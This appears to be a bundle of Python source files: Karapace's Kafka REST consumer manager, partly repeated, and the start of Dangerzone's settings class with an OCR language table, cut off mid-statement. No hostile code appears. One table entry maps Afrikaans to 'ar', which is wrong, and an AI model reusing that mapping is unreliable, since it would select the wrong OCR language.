self._assert_consumer_exists(internal_name, content_type)
self._assert_has_key(request_data, "partitions", content_type)
response = {"offsets": []}
async with self.consumer_locks[internal_name]:
consumer = self.consumers[internal_name].consumer
for el in request_data["partitions"]:
convert_to_int(el, "partition", content_type)
tp = TopicPartition(el["topic"], el["partition"])
commit_info = consumer.committed(tp, metadata=True)
if not commit_info:
continue
response["offsets"].append(
{
"topic": tp.topic,
"partition": tp.partition,
"metadata": commit_info.metadata,
"offset": commit_info.offset,
}
)
KarapaceBase.r(body=response, content_type=content_type)
# SUBSCRIPTION
async def set_subscription(self, internal_name: Tuple[str, str], content_type: str, request_data: dict):
self.log.info("Updating subscription for %s", internal_name)
self._assert_consumer_exists(internal_name, content_type)
topics = request_data.get("topics", [])
topics_pattern = request_data.get("topic_pattern")
async with self.consumer_locks[internal_name]:
consumer = self.consumers[internal_name].consumer
try:
consumer.subscribe(topics=topics, pattern=topics_pattern)
self._update_partition_assignments(consumer)
empty_response()
except AssertionError:
self._illegal_state_fail(
message="Neither topic_pattern nor topics are present in request", content_type=content_type
)
except IllegalStateError as e:
self._illegal_state_fail(str(e), content_type=content_type)
finally:
self.log.info("Done updating subscription")
async def get_subscription(self, internal_name: Tuple[str, str], content_type: str):
self.log.info("Retrieving subscription for %s", internal_name)
self._assert_consumer_exists(internal_name, content_type)
async with self.consumer_locks[internal_name]:
consumer = self.consumers[internal_name].consumer
if consumer.subscription() is None:
topics = []
else:
topics = list(consumer.subscription())
KarapaceBase.r(content_type=content_type, body={"topics": topics})
async def delete_subscription(self, internal_name: Tuple[str, str], content_type: str):
self.log.info("Deleting subscription for %s", internal_name)
self._assert_consumer_exists(internal_name, content_type)
async with self.consumer_locks[internal_name]:
self.consumers[internal_name].consumer.unsubscribe()
empty_response()
# ASSIGNMENTS
async def set_assignments(self, internal_name: Tuple[str, str], content_type: str, request_data: dict):
self.log.info("Updating assignments for %s to %r", internal_name, request_data)
self._assert_consumer_exists(internal_name, content_type)
self._assert_has_key(request_data, "partitions", content_type)
partitions = []
for el in request_data["partitions"]:
convert_to_int(el, "partition", content_type)
self._has_topic_and_partition_keys(el, content_type)
partitions.append(TopicPartition(el["topic"], el["partition"]))
async with self.consumer_locks[internal_name]:
try:
consumer = self.consumers[internal_name].consumer
consumer.assign(partitions)
self._update_partition_assignments(consumer)
empty_response()
except IllegalStateError as e:
self._illegal_state_fail(message=str(e), content_type=content_type)
finally:
self.log.info("Done updating assignment")
async def get_assignments(self, internal_name: Tuple[str, str], content_type: str):
self.log.info("Retrieving assignment for %s", internal_name)
self._assert_consumer_exists(internal_name, content_type)
async with self.consumer_locks[internal_name]:
consumer = self.consumers[internal_name].consumer
KarapaceBase.r(
content_type=content_type,
body={"partitions": [{"topic": pd.topic, "partition": pd.partition} for pd in consumer.assignment()]},
)
# POSITIONS
async def seek_to(self, internal_name: Tuple[str, str], content_type: str, request_data: dict):
self.log.info("Resetting offsets for %s to %r", internal_name, request_data)
self._assert_consumer_exists(internal_name, content_type)
self._assert_has_key(request_data, "offsets", content_type)
seeks = []
for el in request_data["offsets"]:
self._assert_has_key(el, "topic", content_type)
for k in ["offset", "partition"]:
self._assert_has_key(el, k, content_type)
convert_to_int(el, k, content_type)
self._assert_positive_number(el, "offset", content_type)
seeks.append((TopicPartition(topic=el["topic"], partition=el["partition"]), el["offset"]))
async with self.consumer_locks[internal_name]:
consumer = self.consumers[internal_name].consumer
for part, offset in seeks:
try:
consumer.seek(part, offset)
except AssertionError:
self._illegal_state_fail(f"Partition {part} is unassigned", content_type)
empty_response()
async def seek_limit(
self, internal_name: Tuple[str, str], content_type: str, request_data: dict, beginning: bool = True
):
direction = "beginning" if beginning else "end"
self.log.info("Seeking %s offsets", direction)
self._assert_consumer_exists(internal_name, content_type)
self._assert_has_key(request_data, "partitions", content_type)
resets = []
for el in request_data["partitions"]:
convert_to_int(el, "partition", content_type)
for k in ["topic", "partition"]:
self._assert_has_key(el, k, content_type)
resets.append(TopicPartition(topic=el["topic"], partition=el["partition"]))
async with self.consumer_locks[internal_name]:
consumer = self.consumers[internal_name].consumer
try:
if beginning:
consumer.seek_to_beginning(*resets)
else:
consumer.seek_to_end(*resets)
empty_response()
except AssertionError:
self._illegal_state_fail(f"Trying to reset unassigned partitions to {direction}", content_type)
async def fetch(self, internal_name: Tuple[str, str], content_type: str, formats: dict, query_params: dict):
self.log.info("Running fetch for name %s with parameters %r and formats %r", internal_name, query_params, formats)
self._assert_consumer_exists(internal_name, content_type)
async with self.consumer_locks[internal_name]:
consumer = self.consumers[internal_name].consumer
serialization_format = self.consumers[internal_name].serialization_format
config = self.consumers[internal_name].config
request_format = formats["embedded_format"]
self._assert(
cond=serialization_format == request_format,
code=HTTPStatus.NOT_ACCEPTABLE,
sub_code=RESTErrorCodes.UNSUPPORTED_FORMAT.value,
content_type=content_type,
message=f"Consumer format {serialization_format} does not match the embedded format {request_format}",
)
self.log.info("Fetch request for %s with params %r", internal_name, query_params)
try:
timeout = (
int(query_params["timeout"]) if "timeout" in query_params else config["consumer.request.timeout.ms"]
)
# we get to be more in line with the confluent proxy by doing a bunch of fetches each time and
# respecting the max fetch request size
max_bytes = (
int(query_params["max_bytes"]) if "max_bytes" in query_params else consumer.config["fetch_max_bytes"]
)
except ValueError:
KarapaceBase.internal_error(message=f"Invalid request parameters: {query_params}", content_type=content_type)
for val in [timeout, max_bytes]:
if not val:
continue
if val <= 0:
KarapaceBase.internal_error(message=f"Invalid request parameter {val}", content_type=content_type)
response = []
self.log.info(
"Will poll multiple times for a single message with a total timeout of %dms, "
"until at least %d bytes have been fetched",
timeout,
max_bytes,
)
read_bytes = 0
start_time = time.monotonic()
poll_data = defaultdict(list)
message_count = 0
while read_bytes < max_bytes and start_time + timeout / 1000 > time.monotonic():
time_left = start_time + timeout / 1000 - time.monotonic()
bytes_left = max_bytes - read_bytes
self.log.info(
"Polling with %r time left and %d bytes left, gathered %d messages so far",
time_left,
bytes_left,
message_count,
)
data = consumer.poll(timeout_ms=timeout, max_records=1)
self.log.debug("Successfully polled for messages")
for topic, records in data.items():
for rec in records:
message_count += 1
read_bytes += (
max(0, rec.serialized_key_size)
+ max(0, rec.serialized_value_size)
+ max(0, rec.serialized_header_size)
)
poll_data[topic].append(rec)
self.log.info("Gathered %d total messages", message_count)
for tp in poll_data:
for msg in poll_data[tp]:
try:
key = await self.deserialize(msg.key, request_format) if msg.key else None
value = await self.deserialize(msg.value, request_format) if msg.value else None
except (UnpackError, InvalidMessageHeader, InvalidPayload) as e:
KarapaceBase.internal_error(message=f"deserialization error: {e}", content_type=content_type)
element = {
"topic": tp.topic,
"partition": tp.partition,
"offset": msg.offset,
"key": key,
"value": value,
}
response.append(element)
KarapaceBase.r(content_type=content_type, body=response)
async def deserialize(self, bytes_: bytes, fmt: str):
if not bytes_:
return None
if fmt in {"avro", "jsonschema", "protobuf"}:
return await self.deserializer.deserialize(bytes_)
if fmt == "json":
return ujson.loads(bytes_.decode("utf-8"))
return base64.b64encode(bytes_).decode("utf-8")
def close(self):
for k in list(self.consumers.keys()):
c = self.consumers.pop(k)
try:
c.consumer.close()
except: # pylint: disable=bare-except
pass
| from asyncio import Lock
from collections import defaultdict, namedtuple
from functools import partial
from http import HTTPStatus
from kafka import KafkaConsumer
from kafka.errors import IllegalStateError, KafkaConfigurationError, KafkaError
from kafka.structs import OffsetAndMetadata, TopicPartition
from karapace.kafka_rest_apis.error_codes import RESTErrorCodes
from karapace.karapace import empty_response, KarapaceBase
from karapace.serialization import InvalidMessageHeader, InvalidPayload, SchemaRegistryDeserializer
from karapace.utils import convert_to_int
from struct import error as UnpackError
from typing import Tuple
from urllib.parse import urljoin
import asyncio
import base64
import logging
import time
import ujson
import uuid
KNOWN_FORMATS = {"json", "avro", "binary", "jsonschema", "protobuf"}
OFFSET_RESET_STRATEGIES = {"latest", "earliest"}
TypedConsumer = namedtuple("TypedConsumer", ["consumer", "serialization_format", "config"])
class ConsumerManager:
def __init__(self, config: dict) -> None:
self.config = config
self.hostname = f"http://{self.config['advertised_hostname']}:{self.config['port']}"
self.log = logging.getLogger("RestConsumerManager")
self.deserializer = SchemaRegistryDeserializer(config=config)
self.consumers = {}
self.consumer_locks = defaultdict(Lock)
def new_name(self) -> str:
name = str(uuid.uuid4())
self.log.debug("Generated new consumer name: %s", name)
return name
@staticmethod
def _assert(cond: bool, code: HTTPStatus, sub_code: int, message: str, content_type: str) -> None:
if not cond:
KarapaceBase.r(content_type=content_type, status=code, body={"message": message, "error_code": sub_code})
def _assert_consumer_exists(self, internal_name: Tuple[str, str], content_type: str) -> None:
if internal_name not in self.consumers:
KarapaceBase.not_found(
message=f"Consumer for {internal_name} not found among {list(self.consumers.keys())}",
content_type=content_type,
sub_code=RESTErrorCodes.CONSUMER_NOT_FOUND.value,
)
@staticmethod
def _assert_positive_number(
container: dict,
key: str,
content_type: str,
code: HTTPStatus = HTTPStatus.INTERNAL_SERVER_ERROR,
sub_code: int = RESTErrorCodes.INVALID_VALUE.value,
) -> None:
ConsumerManager._assert_has_key(container, key, content_type)
ConsumerManager._assert(
isinstance(container[key], int) and container[key] >= 0,
code=code,
sub_code=sub_code,
content_type=content_type,
message=f"{key} must be a positive number",
)
@staticmethod
def _assert_has_key(element: dict, key: str, content_type: str) -> None:
ConsumerManager._assert(
key in element,
code=HTTPStatus.INTERNAL_SERVER_ERROR,
sub_code=RESTErrorCodes.INVALID_VALUE.value,
message=f"{key} missing from {element}",
content_type=content_type,
)
@staticmethod
def _has_topic_and_partition_keys(topic_data: dict, content_type: str):
for k in ["topic", "partition"]:
ConsumerManager._assert_has_key(topic_data, k, content_type)
@staticmethod
def _topic_and_partition_valid(cluster_metadata: dict, topic_data: dict, content_type: str):
ConsumerManager._has_topic_and_partition_keys(topic_data, content_type)
topic = topic_data["topic"]
partition = topic_data["partition"]
if topic not in cluster_metadata["topics"]:
KarapaceBase.not_found(
message=f"Topic {topic} not found", content_type=content_type, sub_code=RESTErrorCodes.TOPIC_NOT_FOUND.value
)
partitions = {pi["partition"] for pi in cluster_metadata["topics"][topic]["partitions"]}
if partition not in partitions:
KarapaceBase.not_found(
message=f"Partition {partition} not found for topic {topic}",
content_type=content_type,
sub_code=RESTErrorCodes.PARTITION_NOT_FOUND.value,
)
@staticmethod
def create_internal_name(group_name: str, consumer_name: str) -> Tuple[str, str]:
return group_name, consumer_name
@staticmethod
def _validate_create_consumer(request: dict, content_type: str) -> None:
consumer_data_valid = partial(
ConsumerManager._assert,
content_type=content_type,
code=HTTPStatus.UNPROCESSABLE_ENTITY,
sub_code=RESTErrorCodes.INVALID_CONSUMER_PARAMETERS.value,
)
request["format"] = request.get("format", "binary")
consumer_data_valid(request["format"] in KNOWN_FORMATS, message="Invalid format type")
min_bytes_key = "fetch.min.bytes"
consumer_data_valid(
min_bytes_key not in request or isinstance(request[min_bytes_key], int) and request[min_bytes_key] >= -1,
message=f"Expected {min_bytes_key} to be >= -1",
)
auto_reset_key = "auto.offset.reset"
consumer_data_valid(
cond=auto_reset_key not in request or request[auto_reset_key].lower() in OFFSET_RESET_STRATEGIES,
message=f"Invalid value bar for configuration {auto_reset_key}: "
f"String must be one of: {OFFSET_RESET_STRATEGIES}",
)
@staticmethod
def _illegal_state_fail(message: str, content_type: str) -> None:
ConsumerManager._assert(
cond=False,
code=HTTPStatus.CONFLICT,
sub_code=RESTErrorCodes.ILLEGAL_STATE.value,
content_type=content_type,
message=message,
)
@staticmethod
def _update_partition_assignments(consumer: KafkaConsumer):
# This is (should be?) equivalent to calling poll on the consumer.
# which would return 0 results, since the subscription we just created will mean
# a rejoin is needed, which skips the actual fetching. Nevertheless, an actual call to poll is to be avoided
# and a better solution to this is desired (extend the consumer??)
# pylint: disable=protected-access
consumer._coordinator.poll()
if not consumer._subscription.has_all_fetch_positions():
consumer._update_fetch_positions(consumer._subscription.missing_fetch_positions())
# pylint: enable=protected-access
# external api below
# CONSUMER
async def create_consumer(self, group_name: str, request_data: dict, content_type: str):
group_name = group_name.strip("/")
self.log.info("Create consumer request for group %s", group_name)
consumer_name = request_data.get("name") or self.new_name()
internal_name = self.create_internal_name(group_name, consumer_name)
async with self.consumer_locks[internal_name]:
if internal_name in self.consumers:
self.log.error("Error creating duplicate consumer in group %s with id %s", group_name, consumer_name)
KarapaceBase.r(
status=HTTPStatus.CONFLICT,
content_type=content_type,
body={
"error_code": RESTErrorCodes.CONSUMER_ALREADY_EXISTS.value,
"message": f"Consumer {consumer_name} already exists",
},
)
self._validate_create_consumer(request_data, content_type)
self.log.info(
"Creating new consumer in group %s with id %s and request_info %r", group_name, consumer_name, request_data
)
for k in ["consumer.request.timeout.ms", "fetch_min_bytes"]:
convert_to_int(request_data, k, content_type)
try:
enable_commit = request_data.get("auto.commit.enable", self.config["consumer_enable_auto_commit"])
if isinstance(enable_commit, str):
enable_commit = enable_commit.lower() == "true"
request_data["consumer.request.timeout.ms"] = request_data.get(
"consumer.request.timeout.ms", self.config["consumer_request_timeout_ms"]
)
request_data["auto.commit.enable"] = enable_commit
request_data["auto.offset.reset"] = request_data.get("auto.offset.reset", "earliest")
fetch_min_bytes = request_data.get("fetch.min.bytes", self.config["fetch_min_bytes"])
c = await self.create_kafka_consumer(fetch_min_bytes, group_name, internal_name, request_data)
except KafkaConfigurationError as e:
KarapaceBase.internal_error(str(e), content_type)
self.consumers[internal_name] = TypedConsumer(
consumer=c, serialization_format=request_data["format"], config=request_data
)
base_uri = urljoin(self.hostname, f"consumers/{group_name}/instances/{consumer_name}")
KarapaceBase.r(content_type=content_type, body={"base_uri": base_uri, "instance_id": consumer_name})
async def create_kafka_consumer(self, fetch_min_bytes, group_name, internal_name, request_data):
while True:
try:
session_timeout_ms = self.config["session_timeout_ms"]
request_timeout_ms = max(
session_timeout_ms,
KafkaConsumer.DEFAULT_CONFIG["request_timeout_ms"],
request_data["consumer.request.timeout.ms"],
)
c = KafkaConsumer(
bootstrap_servers=self.config["bootstrap_uri"],
client_id=internal_name,
security_protocol=self.config["security_protocol"],
ssl_cafile=self.config["ssl_cafile"],
ssl_certfile=self.config["ssl_certfile"],
ssl_keyfile=self.config["ssl_keyfile"],
sasl_mechanism=self.config["sasl_mechanism"],
sasl_plain_username=self.config["sasl_plain_username"],
sasl_plain_password=self.config["sasl_plain_password"],
group_id=group_name,
fetch_min_bytes=fetch_min_bytes,
fetch_max_bytes=self.config["consumer_request_max_bytes"],
request_timeout_ms=request_timeout_ms,
enable_auto_commit=request_data["auto.commit.enable"],
auto_offset_reset=request_data["auto.offset.reset"],
session_timeout_ms=session_timeout_ms,
)
return c
except: # pylint: disable=bare-except
self.log.exception("Unable to create consumer, retrying")
await asyncio.sleep(1)
async def delete_consumer(self, internal_name: Tuple[str, str], content_type: str):
self.log.info("Deleting consumer for %s", internal_name)
self._assert_consumer_exists(internal_name, content_type)
async with self.consumer_locks[internal_name]:
try:
c = self.consumers.pop(internal_name)
c.consumer.close()
self.consumer_locks.pop(internal_name)
except: # pylint: disable=bare-except
self.log.exception("Unable to properly dispose of consumer")
finally:
empty_response()
# OFFSETS
async def commit_offsets(
self, internal_name: Tuple[str, str], content_type: str, request_data: dict, cluster_metadata: dict
):
self.log.info("Committing offsets for %s", internal_name)
self._assert_consumer_exists(internal_name, content_type)
if request_data:
self._assert_has_key(request_data, "offsets", content_type)
payload = {}
for el in request_data.get("offsets", []):
for k in ["partition", "offset"]:
convert_to_int(el, k, content_type)
# If we commit for a partition that does not belong to this consumer, then the internal error raised
# is marked as retriable, and thus the commit method will remain blocked in what looks like an infinite loop
self._topic_and_partition_valid(cluster_metadata, el, content_type)
payload[TopicPartition(el["topic"], el["partition"])] = OffsetAndMetadata(el["offset"] + 1, None)
async with self.consumer_locks[internal_name]:
consumer = self.consumers[internal_name].consumer
payload = payload or None
try:
consumer.commit(offsets=payload)
except KafkaError as e:
KarapaceBase.internal_error(message=f"error sending commit request: {e}", content_type=content_type)
empty_response()
async def get_offsets(self, internal_name: Tuple[str, str], content_type: str, request_data: dict):
self.log.info("Retrieving offsets for %s", internal_name)
self._assert_consumer_exists(internal_name, content_type)
self._assert_has_key(request_data, "partitions", content_type)
response = {"offsets": []}
async with self.consumer_locks[internal_name]:
consumer = self.consumers[internal_name].consumer
for el in request_data["partitions"]:
convert_to_int(el, "partition", content_type)
tp = TopicPartition(el["topic"], el["partition"])
commit_info = consumer.committed(tp, metadata=True)
if not commit_info:
continue
response["offsets"].append(
{
"topic": tp.topic,
"partition": tp.partition,
"metadata": commit_info.metadata,
"offset": commit_info.offset,
}
)
KarapaceBase.r(body=response, content_type=content_type)
# SUBSCRIPTION
async def set_subscription(self, internal_name: Tuple[str, str], content_type: str, request_data: dict):
self.log.info("Updating subscription for %s", internal_name)
self._assert_consumer_exists(internal_name, content_type)
topics = request_data.get("topics", [])
topics_pattern = request_data.get("topic_pattern")
async with self.consumer_locks[internal_name]:
consumer = self.consumers[internal_name].consumer
try:
consumer.subscribe(topics=topics, pattern=topics_pattern)
self._update_partition_assignments(consumer)
empty_response()
except AssertionError:
self._illegal_state_fail(
message="Neither topic_pattern nor topics are present in request", content_type=content_type
)
except IllegalStateError as e:
self._illegal_state_fail(str(e), content_type=content_type)
finally:
self.log.info("Done updating subscription")
async def get_subscription(self, internal_name: Tuple[str, str], content_type: str):
self.log.info("Retrieving subscription for %s", internal_name)
self._assert_consumer_exists(internal_name, content_type)
async with self.consumer_locks[internal_name]:
consumer = self.consumers[internal_name].consumer
if consumer.subscription() is None:
topics = []
else:
topics = list(consumer.subscription())
KarapaceBase.r(content_type=content_type, body={"topics": topics})
async def delete_subscription(self, internal_name: Tuple[str, str], content_type: str):
self.log.info("Deleting subscription for %s", internal_name)
self._assert_consumer_exists(internal_name, content_type)
async with self.consumer_locks[internal_name]:
self.consumers[internal_name].consumer.unsubscribe()
empty_response()
# ASSIGNMENTS
async def set_assignments(self, internal_name: Tuple[str, str], content_type: str, request_data: dict):
self.log.info("Updating assignments for %s to %r", internal_name, request_data)
self._assert_consumer_exists(internal_name, content_type)
self._assert_has_key(request_data, "partitions", content_type)
partitions = []
for el in request_data["partitions"]:
convert_to_int(el, "partition", content_type)
self._has_topic_and_partition_keys(el, content_type)
partitions.append(TopicPartition(el["topic"], el["partition"]))
async with self.consumer_locks[internal_name]:
try:
consumer = self.consumers[internal_name].consumer
consumer.assign(partitions)
self._update_partition_assignments(consumer)
empty_response()
except IllegalStateError as e:
self._illegal_state_fail(message=str(e), content_type=content_type)
finally:
self.log.info("Done updating assignment")
async def get_assignments(self, internal_name: Tuple[str, str], content_type: str):
self.log.info("Retrieving assignment for %s", internal_name)
self._assert_consumer_exists(internal_name, content_type)
async with self.consumer_locks[internal_name]:
consumer = self.consumers[internal_name].consumer
KarapaceBase.r(
content_type=content_type,
body={"partitions": [{"topic": pd.topic, "partition": pd.partition} for pd in consumer.assignment()]},
)
# POSITIONS
async def seek_to(self, internal_name: Tuple[str, str], content_type: str, request_data: dict):
self.log.info("Resetting offsets for %s to %r", internal_name, request_data)
self._assert_consumer_exists(internal_name, content_type)
self._assert_has_key(request_data, "offsets", content_type)
seeks = []
for el in request_data["offsets"]:
self._assert_has_key(el, "topic", content_type)
for k in ["offset", "partition"]:
self._assert_has_key(el, k, content_type)
convert_to_int(el, k, content_type)
self._assert_positive_number(el, "offset", content_type)
seeks.append((TopicPartition(topic=el["topic"], partition=el["partition"]), el["offset"]))
async with self.consumer_locks[internal_name]:
consumer = self.consumers[internal_name].consumer
for part, offset in seeks:
try:
consumer.seek(part, offset)
except AssertionError:
self._illegal_state_fail(f"Partition {part} is unassigned", content_type)
empty_response()
async def seek_limit(
self, internal_name: Tuple[str, str], content_type: str, request_data: dict, beginning: bool = True
):
direction = "beginning" if beginning else "end"
self.log.info("Seeking %s offsets", direction)
self._assert_consumer_exists(internal_name, content_type)
self._assert_has_key(request_data, "partitions", content_type)
resets = []
for el in request_data["partitions"]:
convert_to_int(el, "partition", content_type)
for k in ["topic", "partition"]:
self._assert_has_key(el, k, content_type)
resets.append(TopicPartition(topic=el["topic"], partition=el["partition"]))
async with self.consumer_locks[internal_name]:
consumer = self.consumers[internal_name].consumer
try:
if beginning:
consumer.seek_to_beginning(*resets)
else:
consumer.seek_to_end(*resets)
empty_response()
except AssertionError:
self._illegal_state_fail(f"Trying to reset unassigned partitions to {direction}", content_type)
async def fetch(self, internal_name: Tuple[str, str], content_type: str, formats: dict, query_params: dict):
self.log.info("Running fetch for name %s with parameters %r and formats %r", internal_name, query_params, formats)
self._assert_consumer_exists(internal_name, content_type)
async with self.consumer_locks[internal_name]:
consumer = self.consumers[internal_name].consumer
serialization_format = self.consumers[internal_name].serialization_format
config = self.consumers[internal_name].config
request_format = formats["embedded_format"]
self._assert(
cond=serialization_format == request_format,
code=HTTPStatus.NOT_ACCEPTABLE,
sub_code=RESTErrorCodes.UNSUPPORTED_FORMAT.value,
content_type=content_type,
message=f"Consumer format {serialization_format} does not match the embedded format {request_format}",
)
self.log.info("Fetch request for %s with params %r", internal_name, query_params)
try:
timeout = (
int(query_params["timeout"]) if "timeout" in query_params else config["consumer.request.timeout.ms"]
)
# we get to be more in line with the confluent proxy by doing a bunch of fetches each time and
# respecting the max fetch request size
max_bytes = (
int(query_params["max_bytes"]) if "max_bytes" in query_params else consumer.config["fetch_max_bytes"]
)
except ValueError:
KarapaceBase.internal_error(message=f"Invalid request parameters: {query_params}", content_type=content_type)
for val in [timeout, max_bytes]:
if not val:
continue
if val <= 0:
KarapaceBase.internal_error(message=f"Invalid request parameter {val}", content_type=content_type)
response = []
self.log.info(
"Will poll multiple times for a single message with a total timeout of %dms, "
"until at least %d bytes have been fetched",
timeout,
max_bytes,
)
read_bytes = 0
start_time = time.monotonic()
poll_data = defaultdict(list)
message_count = 0
while read_bytes < max_bytes and start_time + timeout / 1000 > time.monotonic():
time_left = start_time + timeout / 1000 - time.monotonic()
bytes_left = max_bytes - read_bytes
self.log.info(
"Polling with %r time left and %d bytes left, gathered %d messages so far",
time_left,
bytes_left,
message_count,
)
data = consumer.poll(timeout_ms=timeout, max_records=1)
self.log.debug("Successfully polled for messages")
for topic, records in data.items():
for rec in records:
message_count += 1
read_bytes += (
max(0, rec.serialized_key_size)
+ max(0, rec.serialized_value_size)
+ max(0, rec.serialized_header_size)
)
poll_data[topic].append(rec)
self.log.info("Gathered %d total messages", message_count)
for tp in poll_data:
for msg in poll_data[tp]:
try:
key = await self.deserialize(msg.key, request_format) if msg.key else None
value = await self.deserialize(msg.value, request_format) if msg.value else None
except (UnpackError, InvalidMessageHeader, InvalidPayload) as e:
KarapaceBase.internal_error(message=f"deserialization error: {e}", content_type=content_type)
element = {
"topic": tp.topic,
"partition": tp.partition,
"offset": msg.offset,
"key": key,
"value": value,
}
response.append(element)
KarapaceBase.r(content_type=content_type, body=response)
async def deserialize(self, bytes_: bytes, fmt: str):
if not bytes_:
return None
if fmt in {"avro", "jsonschema", "protobuf"}:
return await self.deserializer.deserialize(bytes_)
if fmt == "json":
return ujson.loads(bytes_.decode("utf-8"))
return base64.b64encode(bytes_).decode("utf-8")
def close(self):
for k in list(self.consumers.keys()):
c = self.consumers.pop(k)
try:
c.consumer.close()
except: # pylint: disable=bare-except
pass
|
import sys
import os
import inspect
import appdirs
import platform
import subprocess
import pipes
import colorama
from colorama import Fore, Back, Style
from .settings import Settings
class GlobalCommon(object):
"""
The GlobalCommon class is a singleton of shared functionality throughout the app
"""
def __init__(self):
# Version
try:
with open(self.get_resource_path("version.txt")) as f:
self.version = f.read().strip()
except FileNotFoundError:
# In dev mode, in Windows, get_resource_path doesn't work properly for dangerzone-container, but luckily
# it doesn't need to know the version
self.version = "unknown"
# Initialize terminal colors
colorama.init(autoreset=True)
# App data folder
self.appdata_path = appdirs.user_config_dir("dangerzone")
# In case we have a custom container
self.custom_container = None
# dangerzone-container path
self.dz_container_path = self.get_dangerzone_container_path()
# Languages supported by tesseract
self.ocr_languages = {
"Afrikaans": "ar",
"Albanian": "sqi",
"Amharic": "amh",
"Arabic": "ara",
"Arabic script": "Arabic",
"Armenian": "hye",
"Armenian script": "Armenian",
"Assamese": "asm",
"Azerbaijani": "aze",
"Azerbaijani (Cyrillic)": "aze_cyrl",
"Basque": "eus",
"Belarusian": "bel",
"Bengali": "ben",
"Bengali script": "Bengali",
"Bosnian": "bos",
"Breton": "bre",
"Bulgarian": "bul",
"Burmese": "mya",
"Canadian Aboriginal script": "Canadian_Aboriginal",
"Catalan": "cat",
"Cebuano": "ceb",
"Cherokee": "chr",
"Cherokee script": "Cherokee",
"Chinese - Simplified": "chi_sim",
"Chinese - Simplified (vertical)": "chi_sim_vert",
"Chinese - Traditional": "chi_tra",
"Chinese - Traditional (vertical)": "chi_tra_vert",
"Corsican": "cos",
"Croatian": "hrv",
"Cyrillic script": "Cyrillic",
"Czech": "ces",
"Danish": "dan",
"Devanagari script": "Devanagari",
"Divehi": "div",
"Dutch": "nld",
"Dzongkha": "dzo",
"English": "eng",
"English, Middle (1100-1500)": "enm",
"Esperanto": "epo",
"Estonian": "est",
"Ethiopic script": "Ethiopic",
"Faroese": "fao",
"Filipino": "fil",
"Finnish": "fin",
"Fraktur script": "Fraktur",
"Frankish": "frk",
"French": "fra",
"French, Middle (ca.1400-1600)": "frm",
"Frisian (Western)": "fry",
"Gaelic (Scots)": "gla",
"Galician": "glg",
"Georgian": "kat",
"Georgian script": "Georgian",
"German": "deu",
"Greek": "ell",
"Greek script": "Greek",
"Gujarati": "guj",
"Gujarati script": "Gujarati",
"Gurmukhi script": "Gurmukhi",
"Hangul script": "Hangul",
"Hangul (vertical) script": "Hangul_vert",
"Han - Simplified script": "HanS",
"Han - Simplified (vertical) script": "HanS_vert",
"Han - Traditional script": "HanT",
"Han - Traditional (vertical) script": "HanT_vert",
"Hatian": "hat",
"Hebrew": "heb",
"Hebrew script": "Hebrew",
"Hindi": "hin",
"Hungarian": "hun",
"Icelandic": "isl",
"Indonesian": "ind",
"Inuktitut": "iku",
"Irish": "gle",
"Italian": "ita",
"Italian - Old": "ita_old",
"Japanese": "jpn",
"Japanese script": "Japanese",
"Japanese (vertical)": "jpn_vert",
"Japanese (vertical) script": "Japanese_vert",
"Javanese": "jav",
"Kannada": "kan",
"Kannada script": "Kannada",
"Kazakh": "kaz",
"Khmer": "khm",
"Khmer script": "Khmer",
"Korean": "kor",
"Korean (vertical)": "kor_vert",
"Kurdish (Arabic)": "kur_ara",
"Kyrgyz": "kir",
"Lao": "lao",
"Lao script": "Lao",
"Latin": "lat",
"Latin script": "Latin",
"Latvian": "lav",
"Lithuanian": "lit",
"Luxembourgish": "ltz",
"Macedonian": "mkd",
"Malayalam": "mal",
"Malayalam script": "Malayalam",
"Malay": "msa",
"Maltese": "mlt",
"Maori": "mri",
"Marathi": "mar",
"Mongolian": "mon",
"Myanmar script": "Myanmar",
"Nepali": "nep",
"Norwegian": "nor",
"Occitan (post 1500)": "oci",
"Old Georgian": "kat_old",
"Oriya (Odia) script": "Oriya",
"Oriya": "ori",
"Pashto": "pus",
"Persian": "fas",
"Polish": "pol",
"Portuguese": "por",
"Punjabi": "pan",
"Quechua": "que",
"Romanian": "ron",
"Russian": "rus",
"Sanskrit": "san",
"script and orientation": "osd",
"Serbian (Latin)": "srp_latn",
"Serbian": "srp",
"Sindhi": "snd",
"Sinhala script": "Sinhala",
"Sinhala": "sin",
"Slovakian": "slk",
"Slovenian": "slv",
"Spanish, Castilian - Old": "spa_old",
"Spanish": "spa",
"Sundanese": "sun",
"Swahili": "swa",
"Swedish": "swe",
"Syriac script": "Syriac",
"Syriac": "syr",
"Tajik": "tgk",
"Tamil script": "Tamil",
"Tamil": "tam",
"Tatar": "tat",
"Telugu script": "Telugu",
"Telugu": "tel",
"Thaana script": "Thaana",
"Thai script": "Thai",
"Thai": "tha",
"Tibetan script": "Tibetan",
"Tibetan Standard": "bod",
"Tigrinya": "tir",
"Tonga": "ton",
"Turkish": "tur",
"Ukrainian": "ukr",
"Urdu": "urd",
"Uyghur": "uig",
"Uzbek (Cyrillic)": "uzb_cyrl",
"Uzbek": "uzb",
"Vietnamese script": "Vietnamese",
"Vietnamese": "vie",
"Welsh": "cym",
"Yiddish": "yid",
"Yoruba": "yor",
}
# Load settings
self.settings = Settings(self)
def display_banner(self):
"""
Raw ASCII art example:
╭──────────────────────────╮
│ ▄██▄ │
│ ██████ │
│ ███▀▀▀██ │
│ ███ ████ │
│ ███ ██████ │
│ ███ ▀▀▀▀████ │
│ ███████ ▄██████ │
│ ███████ ▄█████████ │
│ ████████████████████ │
│ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ │
│ │
│ Dangerzone v0.1.5 │
│ https://dangerzone.rocks │
╰──────────────────────────╯
"""
print(Back.BLACK + Fore.YELLOW + Style.DIM + "╭──────────────────────────╮")
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ▄██▄ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ██████ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ███▀▀▀██ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ███ ████ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
